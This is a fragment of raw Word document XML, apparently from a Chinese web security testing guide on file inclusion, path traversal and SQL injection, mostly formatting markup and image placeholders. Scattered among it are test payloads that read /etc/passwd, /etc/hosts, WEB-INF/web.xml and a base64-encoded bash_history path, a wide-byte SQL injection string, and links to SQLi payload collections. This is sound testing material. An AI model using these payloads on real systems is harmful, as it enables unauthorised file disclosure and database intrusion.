          <v:shape id="_x0000_i1026" o:spt="75" alt="QQ截图20150526194805.png" type="#_x0000_t75" style="height:242.5pt;width:452.5pt;" filled="f" o:preferrelative="t" stroked="f" coordsize="21600,21600">
            <v:path/>
            <v:fill on="f" focussize="0,0"/>
            <v:stroke on="f" joinstyle="miter"/>
            <v:imagedata r:id="rId168" r:href="rId16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bookmarkStart w:id="69" w:name="_Hlk526762416"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="53"/>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52"/>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52"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5755640" cy="15182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0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5761959" cy="152036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52"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4885055" cy="1741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1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5043702" cy="1797879"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="52"/>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2"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4923876" cy="303448"/>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52"/>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952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3"/>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4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5557831" cy="253968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0" b="571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5"/>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6"/>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t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="53"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>www.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="53"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>example.com/register</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52"/>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571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0" b="0"/>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0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5755640" cy="127825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ttp://admin.example.com/login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52"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5755005" cy="4189730"/>
            <wp:effectExtent l="0" t="0" r="0"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1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5775326" cy="4204849"/>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登录验证过程。</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2"/>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3"/>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4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5755640" cy="15278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2"/>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4445" b="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88"/>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53"/>
          <w:rFonts w:eastAsia="微软雅黑"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="53"/>
          <w:rFonts w:eastAsia="微软雅黑"/>
          <w:b/>
        </w:rPr>
        <w:t>7.1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="53"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="微软雅黑"/>
          <w:b/>
        </w:rPr>
        <w:t>文件包含漏洞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包含文件路径的URL。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52"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5755640" cy="1875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9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5755640" cy="1875790"/>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0"/>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1"/>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2"/>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3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5755640" cy="2126615"/>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4"/>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5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5773250" cy="35651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6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5781934" cy="2356351"/>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19050" t="19050" r="16510" b="152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7"/>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19050" t="19050" r="16510" b="2540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8"/>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19050" t="19050" r="16510" b="203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99"/>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19050" t="19050" r="16510" b="152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0"/>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19050" t="19050" r="16510" b="152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1"/>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19050" t="19050" r="16510" b="209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2"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5755640" cy="2950845"/>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19050" t="19050" r="16510" b="273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3"/>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19050" t="19050" r="1651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4"/>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19050" t="19050" r="17145" b="133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5"/>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19050" t="19050" r="16510" b="171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6"/>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52"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5754370" cy="271907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7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5801809" cy="274173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53"/>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52"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rStyle w:val="53"/>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52"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5755640" cy="1301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8"/>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19050" t="19050" r="19050" b="190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09"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4191000" cy="26670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19050" t="19050" r="18415" b="1079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0"/>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1"/>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0" b="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2"/>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19050" t="19050" r="16510" b="11430"/>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4"/>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19050" t="19050" r="16510" b="23495"/>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5"/>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0" b="762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6"/>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19050" t="19050" r="18415" b="15240"/>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7"/>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19050" t="19050" r="16510" b="14605"/>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18"/>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19050" t="19050" r="16510" b="14605"/>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19"/>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0"/>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0" b="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1"/>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0" b="0"/>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2"/>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0" b="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3"/>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0"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4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5773781" cy="248092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53"/>
          <w:rFonts w:eastAsia="微软雅黑"/>
          <w:b/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="53"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="微软雅黑"/>
          <w:b/>
        </w:rPr>
        <w:t>.2.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="53"/>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0" b="5715"/>
            <wp:docPr id="15360" name="图片 15360" descr="9B`VHW50Y}BZT$C1WJIK}@2.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0" b="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 /var/www/html/weathermap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 editor.php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Order Deny, Allow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="23"/>
        <w:pBdr>
          <w:top w:val="single" w:color="CCCCCC" w:sz="6" w:space="6"/>
          <w:left w:val="single" w:color="CCCCCC" w:sz="6" w:space="6"/>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="6" w:space="6"/>
          <w:right w:val="single" w:color="CCCCCC" w:sz="6" w:space="0"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:rPr>
          <w:rStyle w:val="57"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="57"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            Deny from all</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Allow from 127.0.0.1</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="57"/>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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="Helvetica"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://github.com/silentsignal/burp-image-size/releases/download/v0.3/burp-image-size-v0.3-java1.6.jar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>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0" b="952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29"/>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0"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3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0"/>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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="Helvetica"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://drops.xmd5.com/static/drops/papers-15589.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>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3"/>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4"/>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5"/>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6"/>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53"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>禁用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="53"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="53"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ebDAV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="53"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="53"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，若要使用W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="53"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ebDAV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="53"/>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4445" b="635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0"/>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ttp://www.example.com/fckeditor</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25"/>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请求中包括路径字段。</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包含路径字段的请求。</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19050" t="19050" r="17780" b="19050"/>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39"/>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19050" t="19050" r="16510" b="23495"/>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0"/>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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>http://www.a.com/download/2015.pdf?filename=..\..</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..\etc/hosts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>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1"/>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30"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>htt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>p://ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>../../etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>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0" b="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2"/>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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>file:///etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>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0" b="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2"/>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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>file=L3Jvb3QvLmJhc2hfaGlzdG9yeQ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>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19050" t="19050" r="17145" b="17780"/>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3"/>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4"/>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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="Helvetica"/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">file=/WEB-INF/web.xml </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:hint="eastAsia"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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="宋体"/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">path=/etc/passwd.txt/../../WEB-INF/web.xml </w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="宋体"/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="宋体"/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>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62"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5755640" cy="1860550"/>
            <wp:effectExtent l="0" t="0" r="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5"/>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0" b="0"/>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6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5155495" cy="3167308"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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0"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53"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>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Style w:val="53"/>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53"/>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48"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5778564" cy="15965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526872552"/>
      <w:bookmarkStart w:id="79" w:name="_Toc27676954"/>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0"/>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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
        <w:t>http://www.*****.com/***.php?id=xx</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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
        <w:t>http://www.*****.com/index/new/id/8</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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
        <w:t>http://www.*****.com/index/new/php-8.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>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1270" b="635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1"/>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Style w:val="30"/>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3"/>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0"/>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4"/>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5"/>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0"/>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6"/>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508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7"/>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1"/>
      <w:bookmarkStart w:id="81"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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://127.0.0.1/unicodeSqlTest?id=%df</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>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58"/>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0"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59"/>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0"/>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0" b="571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1"/>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30"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>如用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id=123%df%27</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>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2"/>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3"/>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4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4313105" cy="236521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5"/>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6"/>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7"/>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8"/>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508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9"/>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0"/>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1"/>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2"/>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3"/>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4"/>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5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5541813" cy="1060664"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="62"/>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62"/>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6"/>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7"/>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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://github.com/scopion/fuzz-db/blob/master/sql/SQLfuzzing.txt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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rStyle w:val="30"/>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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/sql-injection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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://github.com/trietptm/SQL-Injection-Payloads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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://github.com/client9/libinjection/blob/master/data/sqli-misc.txt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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://github.com/foospidy/payloads/blob/master/owasp/jbrofuzz/sqli.txt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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/Generic-SQLi.txt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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://github.com/foospidy/payloads/blob/master/other/sqli/sqlifuzzer.txt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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://xz.aliyun.com/t/1719</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
        <w:t>https://github.com/sqlmapproject/sqlmap/blob/master/tamper/unmagicquotes.py</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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://124.250.31.122:10010/static/bugs/wooyun-2015-0131545.html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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://124.250.31.122:10010/static/bugs/wooyun-2015-0121068.html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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://124.250.31.122:10010/static/bugs/wooyun-2015-098961.html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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://github.com/sqlmapproject/sqlmap/wiki/Usage</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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://124.250.31.122:10010/static/drops/tools-4760.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rStyle w:val="53"/>
          <w:rFonts w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="82" w:name="_Toc27676955"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="53"/>
          <w:rFonts w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="53"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="53"/>
          <w:rFonts w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="53"/>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0" b="381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78"/>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53"/>
          <w:rFonts w:eastAsia="微软雅黑"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="53"/>
          <w:rFonts w:eastAsia="微软雅黑"/>
          <w:b/>
